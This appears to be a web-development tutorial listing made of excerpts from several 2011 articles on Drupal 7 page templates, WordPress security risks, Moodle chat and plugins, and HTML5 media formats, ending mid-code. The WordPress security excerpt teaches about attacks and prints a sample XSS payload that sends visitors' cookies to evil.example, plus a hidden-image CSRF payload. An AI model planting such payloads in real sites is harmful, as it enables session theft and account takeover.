How-To Tutorials - Web Development

Drupal 7 Themes: Dynamic Theming

Packt
05 Jul 2011
11 min read
Designating a separate Admin theme

Let's start with one of the simplest techniques: designating a separate theme for use by your admin interface. The Drupal 7 system comes bundled with the Seven theme, which is purpose-built for the administration interface. Seven is assigned as your site's admin theme by default. You can, however, change to any theme you desire. Changing the admin theme is done directly from within the admin system's Theme Manager. To change the admin theme, follow these steps:

1. Log in and access your site's admin system.
2. Select the Appearance option from the Management menu.
3. After the Theme Manager loads in your browser, scroll down to the bottom of the page. At the bottom of that page is a combo box labeled Administration theme, as shown in the following screenshot.
4. Select the theme you desire from the combo box.
5. Click Save configuration, and your selected theme should appear immediately.

The Administration theme combo box displays all the enabled themes on your site. If you don't see what you want listed in the combo box, scroll back up and make sure you have enabled the theme you desire. If the theme you desire is not listed in the Theme Manager, you will need to install it first!

Additionally, note the option listed below the Administration theme combo box: Use the administration theme when editing or creating content. Though this option is enabled by default, you may want to de-select it. If you de-select the option, the system will use the frontend theme for content creation and editing. In some cases this is more desirable, as it allows you to see the page in context instead of inside the admin theme. It provides, in other words, a more realistic view of the final content item.

Using multiple page templates

Apart from basic blog sites, most websites today employ different page layouts for different purposes. In some cases this is as simple as one layout for the home page and another for the internal pages. Other sites take this much further and deliver different layouts based on content, function, level of user access, or other criteria. There are various ways you can meet this need with Drupal. Some of the approaches are quite simple and can be executed directly from the administration interface; others require you to work with the files that make up your Drupal theme. Creative use of configuration and block assignments can address some needs. Most people, however, will need to investigate using multiple templates to achieve the variety they desire.

The bad news is that there is no admin system shortcut for controlling multiple templates in Drupal—you must manually create the various templates and customize them to suit your needs. The good news is that creating and implementing additional templates is not terribly difficult, and it is possible to attain a high degree of granularity with the techniques described next. Indeed, should you be so inclined, you could literally define a distinct template for each individual page of your site!

While there are many good reasons for running multiple page templates, you should not create additional templates solely for the purpose of disabling regions to hide blocks. While the approach will work, it will result in a performance hit for the site, as the system will still produce the blocks, only to then wind up not displaying them for the pages.
The better practice is to control your block visibility through the Blocks Manager.

Drupal employs an order of precedence, implemented using a naming convention. You can unlock the granularity of the system through proper application of the naming convention. It is possible, for example, to associate templates with every element on the path, or with specific users, or with a particular functionality or node type—all through the simple process of creating a copy of the existing template and then naming it appropriately. In Drupal terms, this is called creating template suggestions.

When the system detects multiple templates, it prefers the specific to the general. If the system fails to find multiple templates, it will apply the relevant default template from the Drupal core. The fundamental methodology of the system is to use the most specific template file it finds and ignore other, more general templates. This basic principle, combined with proper naming of the templates, gives you control over the template that will be applied in various situations.

The default suggestions provided by the Drupal system should be sufficient for the vast majority of theme developers. However, if you find that you need additional suggestions beyond those provided by the system, it is possible to extend your site and add new suggestions. See http://drupal.org/node/190815 for an example of this advanced Drupal theming technique.

Let's take a series of four examples to show how this system feature can be employed to provide solutions to common problems:

- Use a unique template for your site's home page
- Use a different template for a group of pages
- Assign a specific template to a specific page
- Designate a specific template for a specific user

Creating a unique home page template

Let's assume that you wish to set up a unique look and feel for the home page of a site. The ability to employ a different appearance for the home page and the interior pages is one of the most common requests web developers hear. There are several techniques you can employ to achieve the result; which is right for you depends on the extent and nature of the variation required and, to a lesser extent, on the flexibility of the theme you presently employ. For many people, a combination of the techniques will be used.

Another factor to consider is the abilities of the people who will be managing and maintaining the site. There is often a conflict between what is easiest for the developers and what will be easiest for the site administrators. You need to keep this in mind and strive to create manageable structures. It is, for example, much easier for a client to manage a site that populates the home page dynamically than to have to create content in multiple places and remember to assign things in the proper fashion. In this regard, using dedicated templates for the home page is generally preferable.

One option to address this issue is the creative use of configuration and assignment. You can achieve a degree of variety within a theme—without creating dedicated templates—by controlling the visibility and positioning of the blocks on the home page. Another option you may want to consider is using a contributed module to assist with this task. The Panels and Views modules in particular are quite useful for assembling complex home page layouts. See Useful Extensions for Themers for more information on these extensions.
If configuration and assignment alone do not give you enough flexibility, you will want to consider using a dedicated template that is purpose-built for your home page content. To create a dedicated template for your home page, follow these steps:

1. Access the Drupal installation on your server.
2. Copy your theme's existing page.tpl.php file (if your theme does not have a page.tpl.php file, then copy the default page.tpl.php file from the folder /modules/system).
3. Paste it back in the same directory as the original file and rename it page--front.tpl.php.
4. Make any changes you desire to the new page--front.tpl.php.
5. Save the file.
6. Clear the Drupal theme cache.

That's it—it's really that easy. The system will now automatically display your new template file for the site's home page, and use the default page.tpl.php for the rest of the site. Note that page--front.tpl.php will be applied to whatever page you specify as the site's front page using the site configuration settings. To override the default home page setting, visit the Site Information page from the Configuration Manager. To change the default home page, enter the path of the page you desire to use as the home page into the field labeled Default home page. Next, let's use the same technique to associate a template with a group of pages.

The file naming syntax has changed slightly in Drupal 7. In the past, multiple words contained in a file name were consistently separated with a single hyphen. In Drupal 7, a single hyphen is only used for compound words; a double hyphen is used for targeting a template. For example, page--front.tpl.php uses the double hyphen, as it indicates that we are targeting the page template when displayed for the front page. In contrast, maintenance-page.tpl.php shows the single-hyphen syntax, as it is a compound name. Remember, suggestions only work when placed in the same directory as the base template. In other words, to get page--front.tpl.php to work, you must place it in the same directory as page.tpl.php.
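Putting the steps above together on the command line, the process looks something like the following sketch. It assumes your theme lives at sites/all/themes/mytheme and that you have Drush available for the cache clear (both are assumptions; adjust to your own setup):

    # copy the base template to create the front-page suggestion
    cd sites/all/themes/mytheme
    cp page.tpl.php page--front.tpl.php   # note the double hyphen
    # ...edit page--front.tpl.php as desired, then clear the theme cache:
    drush cc all

Without Drush, you can clear the caches from the Performance page under the Configuration Manager instead.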
Using a different template for a group of pages

You can provide a template to be used by any distinct group of pages. The approach is the same as we saw in the previous section, but the name for the template file derives from the path of the pages in the group. For example, to theme the pages that relate to users, you would create the template page--user.tpl.php.

A note on templates and URLs

Drupal bases the template order of precedence on the default path generated by the system. If the site is using a module like Pathauto, which alters the path that appears to site visitors, remember that your templates will still be selected based on the original paths. The exception here is page--front.tpl.php, which will be applied to whatever page you specify as the site's front page using the site's Configuration Manager.

The following table presents a list of suggestions you can employ to theme various pages associated with the default page groupings in the Drupal system. The steps involved in assigning a template to a group of pages are the same as those used for the creation of a dedicated home page template:

1. Access the Drupal installation on your server.
2. Copy your theme's existing page.tpl.php file (if your theme does not have a page.tpl.php file, then copy the default page.tpl.php file from the folder /modules/system).
3. Paste it back in the same directory as the original file and rename it as shown in the table above, for example page--user.tpl.php.
4. Make any changes you desire to the new template.
5. Save the file.
6. Clear the Drupal theme cache.

Note that the names given in the table above will set the template for all the pages within the group. If you need a more granular solution—that is, to create a template for a sub-group or an individual page within the group—see the discussion in the following sections.

Assigning a specific template to a specific page

Taking this to its extreme, you can associate a specific template with a specific page. By way of example, assume we wish to provide a unique template for a specific content item. Let's assume the page you wish to style is located at http://www.demosite.com/node/2. The path of the page gives you the key to the naming of the template you need to style it. In this case, you would create a copy of the page.tpl.php file and rename it to page--node--2.tpl.php.

Using template suggestion wildcards

One of the most interesting changes in Drupal 7 is the introduction of template suggestion wildcards. In the past, you would have to specify the integer value for individual nodes, for example, page--user--1.tpl.php. If you wished to also style the pages for the entire group of users, you had the choice of either creating page--user.tpl.php, which affects all user pages, including the login forms, or creating individual templates to cover each of the individual users. With Drupal 7, we can now simply use a wildcard in place of the integer values, for example, page--user--%.tpl.php. The new template page--user--%.tpl.php will affect all the individual user pages without affecting the login pages.

Designating a specific template for a specific user

Assume that you want to add a personalized theme for the user with the ID of 1 (the first user in your Drupal system and, for many sites, the ID used by the super user). To do this, copy the existing page.tpl.php file, rename it to reflect its association with the specific user, and make any changes to the new file. To associate the new template file with the user, name the file page--user--1.tpl.php. Now, when the user with ID=1 logs into the site, they will be presented with this template. Only user 1 will see this template, and only when he or she is logged in and visiting the user page.
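To recap the order of precedence at work in these examples: for the node at http://www.demosite.com/node/2, Drupal 7 checks for page templates from the most specific to the most general and uses the first one it finds. As a sketch:

    page--node--2.tpl.php   (this node only)
    page--node--%.tpl.php   (any individual node)
    page--node.tpl.php      (all node pages)
    page.tpl.php            (site-wide default)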
WordPress 3 Security: Risks and Threats

Packt
04 Jul 2011
11 min read
You may think that most of this is irrelevant to WordPress security. Sadly, you'd be wrong. Your site is only as safe as the weakest link: of the devices that assist in administering it or its server; of your physical security; or of your computing and online discipline. To sharpen the point with a simple example, whether you have an Automattic-managed wordpress.com blog or unmanaged dedicated site hosting, if a hacker grabs a password on your local PC, then all bets are off. If a hacker can borrow your phone, then all bets are off. If a hacker can coerce you to a malicious site, then all bets are off. And so on.

Let's get one thing clear. There is no such thing as total security, and anyone who says any different is selling something. Then again, what we can achieve, given ongoing attention, is to boost our understanding, to lock our locations, to harden our devices, to consolidate our networks, to screen our sites and, certainly not least of all, to discipline our computing practice. Even this carries no guarantee. Tell you what though, it's pretty darned tight. Let's jump in and, who knows, maybe even have a laugh here and there to keep us awake.

Calculated risk

So what is the risk? Here's one way to look at the problem:

    RISK = VULNERABILITY x THREAT

A vulnerability is a weakness, a crack in your armour. That could be a dodgy wireless setup or a poorly coded plugin, a password-bearing sticky note, or an unencrypted e-mail. It could just be the tired security guy. It could be 1001 things, and then more besides. The bottom-line vulnerability though, respectfully, is our ignorance.

A threat, on the other hand, is an exploit, some means of hacking the flaw, in turn compromising an asset such as a PC, a router, a phone, your site. That's the sniffer tool that intercepts your wireless, the code that manipulates the plugin, a colleague that reads the sticky, whoever reads your mail, or the social engineer who tiptoes around security.

The risk is the likelihood of getting hacked. If you update the flawed plugin, for instance, then the threat is redundant, reducing the risk. Some risk remains because, when a further vulnerability is found, there will be someone, somewhere, who will tailor an exploit to threaten it. This ongoing struggle to minimize risk is the cat and mouse that is security. To minimize risk, we defend vulnerabilities against threats.

You may be wondering, why bother calculating risk? After all, any vulnerability requires attention. You'd not be wrong but, such is the myriad complexity of securing multiple assets, any of which can add risk to our site, and given that budgets or our time are at issue, we need to prioritize. Risk factoring helps by initially flagging glaring concerns and, ideally assisted by a security policy, ensuring sensible ongoing maintenance. Securing a site isn't a one-time deal. Such is the threatscape, it's an ongoing discipline.

An overview of our risk

Let's take a WordPress site, highlight potential vulnerabilities, and chew over the threats. WordPress is an interactive blogging application written in PHP and working in conjunction with a SQL database to store data and content. The size and complexity of this content manager is extended with third-party code such as plugins and themes.
The framework and WordPress sites are installed on a web server, and that, the platform, and its file system are administered remotely. Let's break that description down:

- WordPress. Powering multi-millions of standalone sites plus another 20 million blogs at wordpress.com, Automattic's platform is an attack target coveted by hackers. According to wordpress.org, 40% of self-hosted sites run the gauntlet with versions 2.3 to 2.9.
- Interactive. Just being online, let alone offering interaction, sites are targets. A website, after all, is effectively an open drawer in an otherwise lockable filing cabinet, the server. Now, we're inviting people server-side not just to read but to manipulate files and data.
- Application, size, and complexity. Not only do applications require security patching but, given the sheer size and complexity of WordPress, there are more holes to plug. Then again, being a mature beast, a non-custom, hardened WordPress site is in itself robust.
- PHP, third-party code, plugins, and themes. Here's a whole new dynamic. The use of poorly written or badly maintained PHP and other code adds a slew of attack vectors.
- SQL database. Containing our most valuable assets, content and data, MySQL and other database apps are directly available to users, making them immediate targets for hackers.
- Data. User data from e-mails to banking information is craved by cybercriminals, and its compromise, else that of our content, costs sites anything from reputation to a drop or ban in search results, as well as carrying the remedial cost of time and money.
- Content and media. Content is regularly copied without permission. Likewise with media, which can also be linked to and displayed on other sites while you pay for its storage and bandwidth. Upload, FTP, and private areas provide further opportunities for mischief.
- Sites. Sites-plural adds risk because a compromise to one can be a compromise to all.
- Web server. Server technologies and wider networks may be hacked directly or via WordPress, jeopardizing sites and data, and being used as springboards for wider attacks.
- File system. Inadequately secured files provide a means of site and server penetration.
- Administered remotely. Casual or unsecured content, site, server, and network administration allows for multi-faceted attacks and, conversely, requires discipline, a secure local working environment, and impenetrable local-to-remote connectivity.

Meet the hackers

This isn't some cunning ploy by yours truly to see how many readers I can attain visitor's rights for, you understand. The fact is, to catch a thief, one has to think like one. Besides, not all hackers are such bad hats. Far from it. Overall there are three types (white hat, grey hat, and black hat), each with their sub-groups.

White hat

One important precedent sets white hats above and beyond other groups: permission. Also known as ethical hackers, these decent upstanding folks are motivated:

- To learn about security
- To test for vulnerabilities
- To find and monitor malicious activity
- To report issues
- To advise others
- To do nothing illegal
- To abide by a set of ethics to not harm anyone

So when we're testing our security to the limit, that should include us. Keep that in mind.

Black hat

Out-and-out dodgy dealers. They have nefarious intent and are loosely sub-categorized:

Botnets

A botnet is a network of automated robots, or scripts, often involved in malicious activity such as spamming or data-mining. The network tends to be comprised of zombie machines, such as your server, which are called upon at will to cause general mayhem.
Botnet operators, the actual black hats, have no interest in damaging most sites. Instead they want quiet control of the underlying server resources so their malbots can, by way of more examples, spread malware or launch Denial of Service (DoS) attacks, the latter using multiple zombies to shower queries on a server to saturate resources and drown out a site.

Cybercriminals

These are hackers and gangs whose activity ranges from writing and automating malware to data-mining, the extraction of sensitive information to extort or sell for profit. They tend not to make nice enemies, so I'll just add that they're awfully clever.

Hacktivists

Politically minded and often inclined towards freedom of information, hacktivists may fit into one of the previous groups, but would argue that they have a justifiable cause.

Scrapers

While not technically hackers, scrapers steal content, often on an automated basis from site feeds, for the benefit of their generally charmless blog or blog farms.

Script kiddies

This broad group ranges from well-intentioned novices (white hat) to online graffiti artists who, when successfully evading community service, deface sites for kicks. Armed with tutorials galore and a share full of malicious warez, the hell-bent are a great threat because, seeking bragging rights, they spew as much damage as they possibly can.

Spammers

Again not technically hackers, but this vast group leeches off blogs and mailing lists to promote their businesses, which frequently seem to revolve around exotic pharmaceutical products. They may automate bomb marketing or embed hidden links but, however educational their comments may be, spammers are generally, but not always, just a nuisance and a benign threat.

Misfits

Not jargon this time, this miscellaneous group includes disgruntled employees, the generally unloved, and that guy over the road who never really liked you.

Grey hat

Grey hatters may have good intentions, but seem to have a knack for misplacing their moral compass, so there's a qualification for going into politics. One might argue, for that matter, that government intelligence departments provide a prime example.

Hackers and crackers

Strictly speaking, hackers are white hat folks who just like pulling things apart to see how they work. Most likely, as kids, they preferred Meccano to Lego. Crackers are black or grey hat. They probably borrowed someone else's Meccano, then built something explosive. Over the years, the lines between hacker and cracker have become blurred to the point that put-out hackers often classify themselves as ethical hackers. This author would argue the point but, largely in the spirit of living language, won't, instead referring to all those trying to break in, for good or bad, as hackers. Let your conscience guide you as to which is which in each instance and, failing that, find a good priest.

Physically hacked off

So far, we have tentatively flagged the importance of a safe working environment and of a secure network from fingertips to page query. We'll begin to tuck in now, first looking at the physical risks to consider along our merry way. Risk falls into the broad categories of physical and technical, and this tome is mostly concerned with the latter. Then again, with physical weaknesses being so commonly exploited by hackers, often as an information-gathering preface to a technical attack, it would be lacking not to mention this security aspect and, moreover, not to sweet-talk the highly successful area of social engineering.
Physical risk boils down to the loss or unauthorized use of (materials containing) data:

- Break-in or, more likely still, a cheeky walk-in
- Dumpster diving, or collecting valuable information, literally from the trash
- Inside jobs, because a disgruntled (ex-)employee can be a dangerous sort
- Lost property, when you leave the laptop on the train
- Social engineering, which is a topic we'll cover separately, so that's ominous
- Something just breaks ... such as the hard-drive

Password-strewn sticky notes aside, here are some more specific red flags to consider when trying to curtail physical risk:

- Building security, whether it's attended or not. By the way, who's got the keys? A cleaner, a doorman, the guy you sacked?
- Discarded media or paper clues that haven't been criss-cross shredded. Your rubbish is your competitor's profit.
- Logged-on PCs left unlocked, unsecured, and unattended, or with hard drives unencrypted and lacking strong admin and user passwords for the BIOS and OS.
- Media, devices, PCs and their internal/external hardware. Everything should be pocketed or locked away, perhaps in a safe.
- No Ethernet jack point protection and no idea about the accessibility of the cable beyond the building.
- No power-surge protection could be a false economy too.

This list is not exhaustive. For mid-sized to larger enterprises, it barely scratches the surface and you, at least, do need to employ physical security consultants to advise on anything from office location to layout, as well as to train staff to create a security culture. Otherwise, if you work in a team, at least, you need a policy detailing each and every one of these elements, whether they impact your work directly or indirectly. You may consider designating and sub-designating who is responsible for what and policing, for example, kit that leaves the office. Don't forget cell and smart phones, and even diaries.
WordPress 3 Security: Overall Risk to Site and Server

Packt
04 Jul 2011
7 min read
How proactive we can be depends on our hosting plan. Then again, harping back to my point about security's best friend—awareness—even Automattic bloggers could do with a heads-up. Just as site and server security each rely on the other, this section mixes the two to outline the big picture of woe and general despair.

The overall concern isn't hard to grasp. The server, like any computer, is a filing cabinet. It has many drawers—or ports—that each contain the files upon which a service (or daemon) depends. Fortunately, most drawers can be sealed, welded shut, but are they? Then again, some administrative drawers, for instance containing control panels, must be accessible to us, only to us, using a super-secure key and with the service files themselves providing no frailty to assist forcing an entry. Others, generally in our case the web files drawer, cannot even be locked because, of course, were it so then no one could access our sites. To compound the concern, there's a risk that someone rummaging about in one drawer can internally access the others and, from there, any networked cabinets.

Let's break down our site and server vulnerabilities, weighing them against some common attack scenarios which, it should be noted, merely tip the iceberg of malicious possibility. Just keep smiling.

Physical server vulnerabilities

Just how secure is the filing cabinet? We've covered physical security and expanded on the black art of social engineering. Clearly, we have to trust our web hosts to maintain the data center and to screen their personnel and contractors. Off-server backup is vital.

Open ports with vulnerable services

We manage ports, and hence differing types of network traffic, primarily with a firewall. That allows or denies data packets depending on the port to which they navigate. FTP packets, for example, navigate to the server's port 21. The web service queues up for 80. Secure web traffic—https rather than http—heads for 443. And so on. Regardless of whether or not, say, an FTP server is installed, if 21 is closed then traffic is denied. So here's the problem. Say you allow an FTP service with a known weakness. Along comes a hacker, exploits the deficiency, and gains a foothold into the machine via its port. Similarly, every service listening on every port is a potential shoo-in for a hacker.
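To make the filing-cabinet metaphor concrete, here is a sketch of that port policy expressed as iptables rules. This is illustrative only, not a production firewall (a real policy needs loopback, SSH, and rate-limiting rules at the very least):

    # default-deny inbound traffic
    iptables -P INPUT DROP
    # allow replies to connections the server itself initiated
    iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    # open only the drawers we actually serve from
    iptables -A INPUT -p tcp --dport 80 -j ACCEPT    # http
    iptables -A INPUT -p tcp --dport 443 -j ACCEPT   # https
    # no rule for port 21: FTP traffic is denied even if a daemon is listening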
Attacking services with a (Distributed) Denial of Service attack

Many in the blogging community will be aware of the Digg of death, a nice problem to have where a post's popularity, duly Digged, leads to a sudden rush of traffic that, if the web host doesn't intervene and suspend the site, can overwhelm server resources and even crash the box. What's happened here is an unintentional denial of service, this time via the web service on port 80. As with most attacks, DoS attacks come in many forms, but the malicious purpose, often concentrated at big sites or networks and sometimes to gain a commercial or political advantage, is generally to flood services and, ultimately, to disable HTTP. As we introduced earlier, the distributed variety is the most powerful, synchronizing the combined processing power of a zombie network, or botnet, against the target.

Access and authentication issues

In most cases, we simply deny access by disabling the service and closing its port. Many of us, after all, only ever need web and administration ports. Only? Blimey! Server ports, such as for direct server access or using a more user-friendly middleman such as cPanel, could be used to gain unwanted entry if the corresponding service can be exploited or if a hacker can glean your credentials. Here are some typical scenarios.

Buffer overflow attacks

This highly prevalent kind of memory attack is assisted by poorly written software and utilizes a scrap of code that's often introduced through a web form field or via a port-listening service, such as that dodgy FTP daemon mentioned previously. Take a simplistic example. You've got a slug of RAM in the box and, on submitting data to a form, that data queues up in a memory space, a buffer, where it awaits processing. Now, imagine someone submits malicious code that's longer, containing more bits, than the programmer allowed for. Again, the data queues in its buffer but, being too long, it overflows, overwriting the form's expected command and having itself executed instead.

So what about the worry of swiped access credentials? Again, possibilities abound.

Intercepting data with man-in-the-middle attacks

The MITM is where someone sits between your keystrokes and the server, scouring the data. That could be, for example, a rootkit, a data logger, a network, or a wireless sniffer. If your data transits unencrypted, in plain text, as is the case with FTP or HTTP and commonly with e-mail, then everything is exposed. That includes login credentials.

Cracking authentication with password attacks

Brute force attacks run through alphanumeric and special-character combinations against a login function, such as for a control panel or the Dashboard, until the password is cracked. They're helped immensely when the username is known, so there's a hint not to use that regular old WordPress chestnut, admin. Brute forcing can be time-consuming, but can also be coordinated between multiple zombies, warp-speeding the process with their combined processing power. Dictionary attacks, meanwhile, throw A-Z word lists against the password, and hybrid attacks morph brute force and dictionary techniques to crack naïve keys such as pa55worD.

The many dangers of cross-site scripting (XSS)

XSS crosses bad code—adds it—with an unsecured site. Site users become a secondary target here because when they visit a hacked page, and their browser properly downloads everything as it resolves, they retrieve the bad code to become infected locally. An in-vogue example is the iframe injection, which adds a link that leads to, say, a malicious download on another server. When a visitor duly views the page, downloading it locally, malware and all, the attacker has control over that user's PC. Lovely.

There's more. Oh so much more. Books more, in fact. There's too much to mention here, but another classic tactic is to use XSS for cookie stealing. All that's involved here is a code injection to some poor page that reports to a log file on the hacker's server. Page visitors have their cookies chalked up to the log and their session hijacked, together with their session privileges. If the user's logged into webmail, so can the hacker be. If it's online banking, goodbye to your funds. If the user's a logged-in WordPress administrator, you get the picture.
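For illustration only, a cookie-stealing injection of the kind just described can be as small as this (evil.example is a placeholder; the sketch assumes the attacker can write script into a vulnerable page):

    <!-- hypothetical injected payload: ships each visitor's cookies
         to a log on the attacker's server -->
    <script>
      new Image().src = 'http://evil.example/log?c=' +
                        encodeURIComponent(document.cookie);
    </script>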
Assorted threats with cross-site request forgery (CSRF)

This is not the same as XSS, but there are similarities, the main one being that, again, a blameless if poorly built site is crossed with malicious code to cause an effect. A user logs into your site and, in the regular way, is granted a session cookie. The user surfs some pages, one of them having been decorated with some imaginative code from an attacker, which the user's browser correctly downloads. Because that script said to do something to your site, and because the unfortunate user hadn't logged out of your site, relinquishing the cookie, the action is authorized by the user's browser. What may happen to your site, for example, depends on the user's privileges, so it could vary from a password change or data theft to a nice new theme effect called digital soup.
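Again purely as an illustration, the classic trick is a disguised image tag on the attacker's page; the victim's browser dutifully attaches their session cookie to the forged request (the URL and parameter here are hypothetical):

    <!-- hypothetical CSRF payload: a 1x1 "image" that silently fires an
         authenticated request against the victim site -->
    <img src="http://victim.example/admin/change-email?new=attacker@evil.example"
         width="1" height="1" alt="" />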
Moodle: History Teaching using Chats, Books and Plugins

Packt
29 Jun 2011
4 min read
The Chat Module

Students naturally gravitate towards the Chat module in Moodle. It is one of the modules that they effortlessly use whilst working on another task. I often find that they have logged in and are discussing work-related tasks in a way that enables them to move forward on a particular task. Another use for the Chat module is to conduct a discussion outside the classroom timetabled lesson, when students know that you are available to help them with issues. This is especially relevant to students who embark on study leave in preparation for examinations. It can be a lonely and stressful period. Knowing that they can log in to a chat that has been planned in advance means that they can prepare issues that they wish to discuss about their workload and find out how their peers are tackling the same issues. The teacher can ensure that the chat stays on message and provide useful input at the same time.

Setting up a Chatroom

We want to set up a chat with students who are on holiday but have some examination preparation to do for a lesson that will take place straight after their return to school. Ideally, we would have informed the students prior to starting their holiday that this session would be available to anyone who wished to take part.

1. Log in to the Year 7 History course and turn on editing.
2. In the Introduction section, click the Add an activity dropdown.
3. Select Chat.
4. Enter an appropriate name for the chat.
5. Enter some relevant information in the Introduction text.
6. Select the date and time for the chat to begin.
7. Beside Repeat sessions, select No repeats – publish the specified time only.
8. Leave other elements at their default settings.
9. Click Save changes.

The following screenshot is the result of clicking Add an activity from the drop-down menu. If we wanted to set up the chatroom so that the chat took place at the same time each day, or each week, then it is possible to select the appropriate option from the Repeat sessions dropdown. The remaining options make it possible for students to go back and view sessions that they have taken part in.

Entering the chatroom

When a student or teacher logs in to the course for the appointed chat, they will see the chat symbol in the Introduction section. Clicking on the symbol enables them to enter the chatroom via a simple chat window, or a more accessible version where checking the box ensures that only new messages appear on the screen, as shown in the following screenshot. As long as another student or teacher has entered the chatroom, a chat can begin when users type a message and await a response.

The Chat module is a useful way for students to collaborate with each other and with their teacher if they need to. It comes into its own when students are logging in to discuss how to make progress with their collaborative wiki story about a murder in the monastery, or when students preparing for an examination share tips and advice to help each other through the experience. Collaboration is the key to effective use of the Chat module, and teachers need not fear its potential for timewasting if this point is emphasized in the activities that they are working on.

Plugins

A brief visit to www.moodle.org and a search for 'plugins' reveals an extensive list of modules that are available for use with Moodle but stand outside the standard installation. If you have used a blogging tool such as WordPress, you will be familiar with the concept of plugins.
Over the last few years, developers have built up a library of plugins which can be used to enhance your Moodle experience. Every teacher has different ways of doing things, and it is well worth exploring the plugins database and related forums to find out what teachers are using and how they are using it. There is, for example, a plugin for writing individual learning plans for students, and another plugin called Quickmail which enables you to send an email to everyone on your course even more quickly than the conventional way.

Installing plugins

Plugins need to be installed, and they need administrator rights to run at all. The Book module, for example, requires a zip file to be downloaded from the plugins database onto your computer; the files then need to be extracted to a folder in the mod folder of your Moodle software directory. Once it is in the correct folder, the administrator then needs to run the installation. Installation has been successful if you are able to log in to the course and see the Book module as an option in the Add a resource dropdown.
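As a sketch, the file operations for the Book module might look like the following, assuming a typical Moodle directory layout (the paths are assumptions; adjust them to your server):

    # extract the downloaded plugin archive into Moodle's module directory
    cd /path/to/moodle/mod
    unzip ~/downloads/book.zip      # should create mod/book
    # then log in as administrator so Moodle can run the installation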
HTML5: Audio and Video Elements

Packt
28 Jun 2011
9 min read
Understanding audio and video file formats

There are plenty of different audio and video file formats. These files may include not just video but also audio and metadata, all in one file. These file types include:

- .avi – A blast from the past, the Audio Video Interleave file format was invented by Microsoft. It does not support most modern audio and video codecs in use today.
- .flv – Flash video. This used to be the only video file format Flash fully supported. Now it also includes support for .mp4.
- .mp4 or .mpv – MPEG4 is based on Apple's QuickTime player and requires that software for playback.

How it works...

Each of the previously mentioned video file formats requires a browser plugin or some sort of standalone software for playback. Next, we'll look at newer audio and video file formats that don't require plugins or special software, and the browsers that support them.

H.264 has become one of the most commonly used high-definition video formats. It is used on Blu-ray Discs as well as by many Internet video-streaming services, including Flash, the iTunes Music Store, Silverlight, Vimeo, YouTube, cable television broadcasts, and real-time videoconferencing. In addition, there is a patent on H.264; it is therefore, by definition, not open source. Browsers that support the H.264 video file format include:

Google has now partially rejected the H.264 format and is leaning more toward its support of the new WebM video file format instead.

Ogg might be a funny-sounding name, but its potential is very serious, I assure you. Ogg is really two things: Ogg Theora, which is a video file format; and Ogg Vorbis, which is an audio file format. Theora is really much more of a video file compression format than it is a playback file format, though it can be used that way also. It has no patents and is therefore considered open source. Fun fact: According to Wikipedia, "Theora is named after Theora Jones, Edison Carter's controller on the Max Headroom television program." Browsers that support the Ogg video file format include:

WebM is the newest entrant in the online video file format race. This open source audio/video file format development is sponsored by Google. A WebM file contains both an Ogg Vorbis audio stream as well as a VP8 video stream. It is fairly well supported by media players including Miro, Moovidia, VLC, Winamp, and more, including preliminary support by YouTube. The makers of Flash say it will support WebM in the future, as will Internet Explorer 9. Browsers that currently support WebM include:

There's more...

So far this may seem like a laundry list of audio and video file formats with spotty browser support at best. If you're starting to feel that way, you'd be right. The truth is no one audio or video file format has emerged as the one true format to rule them all. Instead, we developers will often have to serve up the new audio and video files in multiple formats while letting the browser decide whichever one it's most comfortable and able to play. That's a drag for now, but here's hoping in the future we settle on fewer formats with more consistent results.

Audio file formats

There are a number of audio file formats as well. Let's take a look at those.

AAC – Advanced Audio Coding files are better known as AACs. This audio file format was created by design to sound better than MP3s using the same bitrate. Apple uses this audio file format for its iTunes Music Store. Since the AAC audio file format supports DRM, Apple offers files in both protected and unprotected formats.
There is an AAC patent, so by definition we can't exactly call this audio file format open source. All Apple hardware products, including their mobile iPhone and iPad devices, as well as Flash, support the AAC audio file format. Browsers that support AAC include:

MP3 – MPEG-1 Audio Layer 3 files are better known as MP3s. Unless you've been hiding under a rock, you know MP3s are the most ubiquitous audio file format in use today. Capable of playing two channels of sound, these files can be encoded using a variety of bitrates up to 320. Generally, the higher the bitrate, the better the audio file sounds. That also means larger file sizes and therefore slower downloads. There is an MP3 patent, so by definition we can't exactly call this audio file format open source either. Browsers that support MP3 include:

Ogg – We previously discussed the Ogg Theora video file format. Now, let's take a look at the Ogg Vorbis audio format. As mentioned before, there is no patent on Ogg files, and they are therefore considered open source. Another fun fact: According to Wikipedia, "Vorbis is named after a Discworld character, Exquisitor Vorbis in Small Gods by Terry Pratchett."

File format agnosticism

We've spent a lot of time examining these various video and audio file formats. Each has its own plusses and minuses and is supported (or not) by various browsers. Some work better than others; some sound and look better than others. But here's the good news: the new HTML5 <video> and <audio> elements themselves are file-format agnostic! Those new elements don't care what kind of video or audio file you're referencing. Instead, they serve up whatever you specify and let each browser do whatever it's most comfortable doing.

Can we stop the madness one day?

The bottom line is that until one new HTML5 audio and one new HTML5 video file format emerges as the clear choice for all browsers and devices, audio and video files are going to have to be encoded more than once for playback.

Creating accessible audio and video

In this section we will pay attention to those people who rely on assistive technologies.

How to do it...

First, we'll start with Kroc Camen's "Video for Everybody" code chunk and examine how to make it accessibility friendly, to ultimately look like this:

    <div id="videowrapper">
      <video controls height="360" width="640">
        <source src="__VIDEO__.MP4" type="video/mp4" />
        <source src="__VIDEO__.OGV" type="video/ogg" />
        <object width="640" height="360" type="application/x-shockwave-flash"
          data="__FLASH__.SWF">
          <param name="movie" value="__FLASH__.SWF" />
          <param name="flashvars"
            value="controlbar=over&amp;image=__POSTER__.JPG&amp;file=__VIDEO__.MP4" />
          <img src="__VIDEO__.JPG" width="640" height="360" alt="__TITLE__"
            title="No video playback capabilities, please download the video below" />
        </object>
        <track kind="captions" src="videocaptions.srt" srclang="en" />
        <p>Final fallback content</p>
      </video>
      <div id="captions"></div>
      <p><strong>Download Video:</strong>
        Closed Format: <a href="__VIDEO__.MP4">"MP4"</a>
        Open Format: <a href="__VIDEO__.OGV">"Ogg"</a>
      </p>
    </div>

How it works...

The first thing you'll notice is that we've wrapped the new HTML5 video element in a wrapper div. While this is not strictly necessary semantically, it will give us a nice "hook" to tie our CSS into:

    <div id="videowrapper">

Much of the next chunk should be recognizable from the previous section.
Nothing has changed here:

    <video controls height="360" width="640">
      <source src="__VIDEO__.MP4" type="video/mp4" />
      <source src="__VIDEO__.OGV" type="video/ogg" />
      <object width="640" height="360" type="application/x-shockwave-flash"
        data="__FLASH__.SWF">
        <param name="movie" value="__FLASH__.SWF" />
        <param name="flashvars"
